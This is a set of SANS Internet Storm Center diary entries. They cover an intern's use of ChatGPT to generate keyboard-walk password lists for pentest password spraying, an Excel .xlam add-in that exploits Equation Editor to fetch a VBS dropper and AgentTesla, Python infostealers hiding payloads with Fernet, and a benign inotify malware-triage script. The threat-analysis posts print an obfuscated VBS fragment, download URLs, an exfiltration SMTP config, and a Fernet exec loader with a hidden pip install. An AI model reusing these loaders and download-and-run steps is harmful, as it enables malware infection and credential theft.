• timedcommand
• moveScript
• selfUpdate
• msgBox
• changeWallpaper
• getfile
• gotfile
• gotfilekey

I searched for similar scripts with valid credentials, but nothing was found yet. If you spotted the same kind of script, please share!

This is another good proof that egress filtering must be in place to prevent hosts from communicating through exotic ports! (5432 in this case). Stay safe!

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

[This is a Guest Diary by John Grant, an ISC intern as part of the SANS.edu  BACS program]

Introduction

I have noticed default passwords and keyboard walks are some of the most popular passwords found in the SSH/Telnet logs on my dshield honeypot. It is a known issue in the Cybersecurity industry and often found throughout compromised password dumps. Users believe long keyboard walks are secure however, it can be is easily guessed by attackers even when the password includes numbers and shift to create special characters. 

Password spraying attack background

Password spraying is a common password attack in enterprise networks where the attacker takes a small amount of passwords and spray them against all users with the hope of finding a user using a weak or guessable password. Once the attacker compromises one user they can query Active Directory with the Powershell command “Get-ADDefaultDomainPasswordPolicy” which will allow the attacker to enumerate the lockout policy and how to continue spraying passwords on the enterprise network without the risk of locking out accounts. 

During penetration tests I like to run password spraying attacks after enumerating the lockout policy as noted above and use a tool like “spraycharles” found on GitHub to automate the password spray attack while I work on other testing items that require more manual interactions. One of the input requirements of spraycharles is a password list or single password to test. I normally create a list of passwords to try using common qwerty keyboard walks and spray them throughout the test. If the client Active Directory policy is not following best practices of LockoutDuration and LockoutThreshold settings it possible to exhaust a password spray list quickly so I wanted to create a python script I could use during a test to quickly create qwerty style passwords that use numbers and special characters.

Using ChatGPT to generate some code as a starting point

I have found creating python scripts from scratch to be challenging to know where to begin. For this assignment I wanted to experiment with an AI tool like ChatGPT to generate some code quickly and get started. I also planned to use ChatGPT to help me add features to the code as I came up with ideas on how to add features. Additionally, I wanted to use ChatGPT to help me work through any errors in the code along the way by just copying the error output and pasting it in the next message to ChatGPT.

During this assignment, as with coding a script from scratch it helps to start with a basic request or task for ChatGPT and iterate slowly adding more features once you having working code vice posing a huge task in case you have errors in the ChatGPT output. Starting with a small amount of code will make it easier to figure out the error(s). If you cannot figure out the error you can always send a new message to ChatGPT with the error and ask it to fix the error however, this process has mixed success in my experience.

Next I add a prompt for the user to input the desired length of the passwords generated:

You may have noticed ChatGPT hard coded the amount of passwords generated to 10 so next I will ask ChatGPT to add a prompt to allow the user to decide how many passwords to generate. 

Oops it looks like the ChatGPT generated a random password list and does not follow the qwerty keyboard walk like we hoped so we will try to ask it to fix the script:

Looking at the code and output, I realized ChatGPT was struggling to accurately reference the keyboard layout in the way I was telling it to generate qwerty style passwords and after numerous iterations to the code, I finally got it to output a simple keyboard walk from the top row of keyboard to the bottom using a Pandas DataFrame format to be able to reference columns and rows. 

Now using the example Active Directory setting above we created 20 passwords with the length of 8 characters:

Now that have some working code we can add back in the feature of sending the output to a text file and removing the "Generated Password":

Conclusion
This project showed me that ChatGPT needs clear parameters and sometimes lots of trial and error to create the python code you are trying to create. Also, it is best to start with a simple core function and slowly build complexity, which will make it easier to troubleshoot any errors in the code. This project reminded me of to the “tire swing analogy” except it is was between me and AI, trying to get it to generate code to automate a tedious task of generating qwerty style passwords.

Disclaimer: This project used the free version of ChatGPT so in all fairness the paid version of ChatGPT may cause less errors, more user friendly and reduce the amount of trial and error. 

[1] https://github.com/Tw1sm/spraycharles
[2] https://www.sans.edu/cyber-security-programs/bachelors-degree/

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Excel is an excellent target for attackers. The Microsoft Office suite is installed on millions of computers, and people trust these files. If we have the classic xls, xls, xlsm file extensions, Excel supports many others! Just check your local registry:

Attackers like to use more “exotic” extensions to increase chances of evading simple and stupid rules at mail gateways. This time, the extension used was “.xlam”. I spotted several emails (probably from the same campaign) that delivered .xlam files to potential victims.

An XLAM file is a macro-enabled add-in used to add new features to Excel. The icon looks like Excel and should make the user confident to open it:

Once loaded, you can see the add-on in Excel:

The add-on has the following SHA256: 72006dfd34f5b043e6763b16ff8399382e69ad356e8c6b9e71ec908674dab55c and a VT score of 30/56[1].

If you read “macro-enabled”, it’s not classic VBA macro, but this add-on contains an exploit for the good old Equation Editor (%%cve::2017-1182%%). If successfully exploited, the add-on will download a malicious VBS script and execute it:

C:\Windows\System32\WScript.exe" "C:\Users\user01\AppData\Roaming\oldgyyudi.vbs"

The URL from where the script is downloaded is http://80[.]76[.]51[.]248/afk.vbs

The script has the following SHA256: d93c28f9ceeac993f652f976e12eba842716d571370bcdb2dd912965aa6274fb (unknown on VT at this time) and is pretty well obfuscated. Here is an example of a function that reverses a string:

Escola = drRgvLwPScMUPVCgWhShgMSmjRqaWCUXzUCPCcDqXCNWRLWXvdWLpQmrjqdvCWZzRcUiWUrawWCsywwLLVsoBPeWDkNtPrWMEMEPZlGYBLWZMhMmMMZVWgeCwhgXq Escola = eKRiX(eKRiX(eKRiX(Escola))) [...] Function eKRiX(iNcPxLbcdBdHlsOAcdpbduplKWscQhRhriWZpuxAGtjteLbDKxgbQjArhOoIuccrMKcNHRiJWiuBxLOUbKyUuLcboDKKbzuhLJCTwrTtcOspGRMunLiIoOogKuiencc) qArcGzUDayYkTOOcTWLZccaLRrsnUkODDkkHOcpTDMaUNzsXrXTnHUTYLCqrOfyGNJkRLUQnMLOQNWUnKOGkMWUTNJYZLiUZfNzHyccKMKwINzNLYNINsrKBWzsDi = Chr(83)&Chr(116)&Chr(114)&Chr(82)&Chr(101)&Chr(118)&Chr(101)&Chr(114)&Chr(115)&Chr(101) nnUTLnLIujuBNUwLIOWkWRfBJwUWcrGrIawtWSLIShigAikDLGDwKWLmrGcvRaoIUUPcgOaklvOcDQGiLyaiKLoLeDUGkpPfQkKaimahWwOfgGUcuLaveqcDWObduPr =   "eKRiX = " nnUTLnLIujuBNUwLIOWkWRfBJwUWcrGrIawtWSLIShigAikDLGDwKWLmrGcvRaoIUUPcgOaklvOcDQGiLyaiKLoLeDUGkpPfQkKaimahWwOfgGUcuLaveqcDWObduPr = nnUTLnLIujuBNUwLIOWkWRfBJwUWcrGrIawtWSLIShigAikDLGDwKWLmrGcvRaoIUUPcgOaklvOcDQGiLyaiKLoLeDUGkpPfQkKaimahWwOfgGUcuLaveqcDWObduPr + qArcGzUDayYkTOOcTWLZccaLRrsnUkODDkkHOcpTDMaUNzsXrXTnHUTYLCqrOfyGNJkRLUQnMLOQNWUnKOGkMWUTNJYZLiUZfNzHyccKMKwINzNLYNINsrKBWzsDi nnUTLnLIujuBNUwLIOWkWRfBJwUWcrGrIawtWSLIShigAikDLGDwKWLmrGcvRaoIUUPcgOaklvOcDQGiLyaiKLoLeDUGkpPfQkKaimahWwOfgGUcuLaveqcDWObduPr = nnUTLnLIujuBNUwLIOWkWRfBJwUWcrGrIawtWSLIShigAikDLGDwKWLmrGcvRaoIUUPcgOaklvOcDQGiLyaiKLoLeDUGkpPfQkKaimahWwOfgGUcuLaveqcDWObduPr + "(iNcPxLbcdBdHlsOAcdpbduplKWscQhRhriWZpuxAGtjteLbDKxgbQjArhOoIuccrMKcNHRiJWiuBxLOUbKyUuLcboDKKbzuhLJCTwrTtcOspGRMunLiIoOogKuiencc)" execute(nnUTLnLIujuBNUwLIOWkWRfBJwUWcrGrIawtWSLIShigAikDLGDwKWLmrGcvRaoIUUPcgOaklvOcDQGiLyaiKLoLeDUGkpPfQkKaimahWwOfgGUcuLaveqcDWObduPr) End Function

The variable Escola will contain the string "Startup".

The next payload is downloaded from http://80[.]76[.]515.]248/afrique.txt, which returns a Base64-encoded string (reversed) that is decoded as a PE file (SHA256: e45d91008eb19ecc3c9e6aab13339bc327c2c61b97215b0d2cc98c23b0db057a). This is an AgenTesla with the following config:

{ "rule": "AgentTeslaV4", "family": "agenttesla", "credentials": [ { "host": "mail.worlorderbillions.top", "port": 587, "email_to": "absach@worlorderbillions[.]top", "password": “xxxxxxxxxxxxxxxxx”, "protocol": "smtp", "username": "absach@worlorderbillions[.]top" } ] }

[1] https://www.virustotal.com/gui/file/72006dfd34f5b043e6763b16ff8399382e69ad356e8c6b9e71ec908674dab55c

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

In cryptography, there is a gold rule that states to not develop your own algorithm because... it will be probably weak and broken! They are strong algorithms (like AES) that do a great job so why reinvent the wheel? However, there are projects that try to develop new algorithms. One of them is Fernet[1], described like this: 

Fernet guarantees that a message encrypted using it cannot be manipulated or read without the key. Fernet is an implementation of symmetric (also known as “secret key”) authenticated cryptography.

Fernet is available in many programming languages as a library/module/... one of them is, of course, Python[2]. The algorithm is not brand new and exists for years; the Python module has been last updated in 2016! I started to see some malicious scripts using Fernet to encrypt their payloads. I had a quick look at my hunting results and we can see a small trend starting across the last six months:

The usage of Fernet is pretty efficient. The last sample I detected has a VT score of 2/60! The script remains very simple:

import subprocess creationflags = subprocess.CREATE_NEW_PROCESS_GROUP | subprocess.CREATE_NO_WINDOW from fernet import Fernet exec(Fernet(b'uSS2i-KrquUVErKGb1AFc7qQa695Aa_rae36i7Y9wUo=').decrypt(b'gAAAAABk26 ... oZUwkZW6TTIWcWnYoTExo=').decode('utf-8'))

But wait, Fenet is not installed by default in Windows Python environment. How to use it? Easy, just try to install it:

creationflags = subprocess.CREATE_NEW_PROCESS_GROUP | subprocess.CREATE_NO_WINDOW subprocess.Popen(['cmd.exe','/c','start','/b','pip', 'install', 'fernet'],creationflags=creationflags)

For the story, the decrypted and executed payload is an infostealer.

[1] https://github.com/fernet/spec
[2] https://pypi.org/project/fernet/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

When you handle a lot of malicious files, you must have a process and tools in place to speedup the analysis. It's impossible to investigate all files and a key point is to find interesting files that deserve more attention. In my malware analysis lab, I use a repository called my "Malware Zoo" where I put all the files. This repository is shared across different hosts (my computer, REMnux and Windows virtual machines). This helps me to keep all the "dangerous files" in a central location and avoid spreading dangerous stuff everywhere. When you analyze a malware, you'll quickly generate more files: You extract shellcodes, configurations, DLLs, more executables and those files should also be analyzed. To perform a quick triage with basic operations, I rely on the Inotify[1] suite. 

This suite of tools allow to you track changes on a file system. Via command line tools, you can get events when a file has been created, deleted, opened. I'm using a simple script on my malware zoo that receives notifcations everytime a file is created (which means I dropped a new sample). Then the script performs simple actions. By default:

• It generates the SHA256 of the file
• It performs a lookup on VT

Of course, the script can perform deeper actions depending on the file type. Extract strings from PE files, disassemble a shell code, the sky is the limit!

Here is my simple script:

#!/bin/bash # # inotify_triage.sh - Automatic triage script based on inotifywait # # Path to monitor MALWAREZOO="/data/my_malware_zoo" inotifywait -m -e create -r --exclude "\.(tmp|sha256sum|vtresults|sw\w+)$" $MALWAREZOO | while read path action file do logger "File $file created in $path" # Generate SHA256 SHA256=`shasum -a 256 $path$file | cut -d " " -f 1` echo $SHA256 >$path$file.sha256sum # Search file on VT vt -s $SHA256 >$path$file.vtresults   # PE File   if (file $path$file| grep -q PE32) then # Perform PE files triage   fi   # Uploaded to MWDB   mwdb.py -t "autotriage" $pathfile done

Once launched, the script will get notified when a file is create. Very important, you must exclude all files that will be created by the script! This script is running on my REMnux via systemd (to be launched at boot time and kept running in the background.

Warning: the script above is very simple and should perform triage very quickly. If you need to launch time-consuming actions, it's recommended to launch them in the background!

[1] https://en.wikipedia.org/wiki/Inotify

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.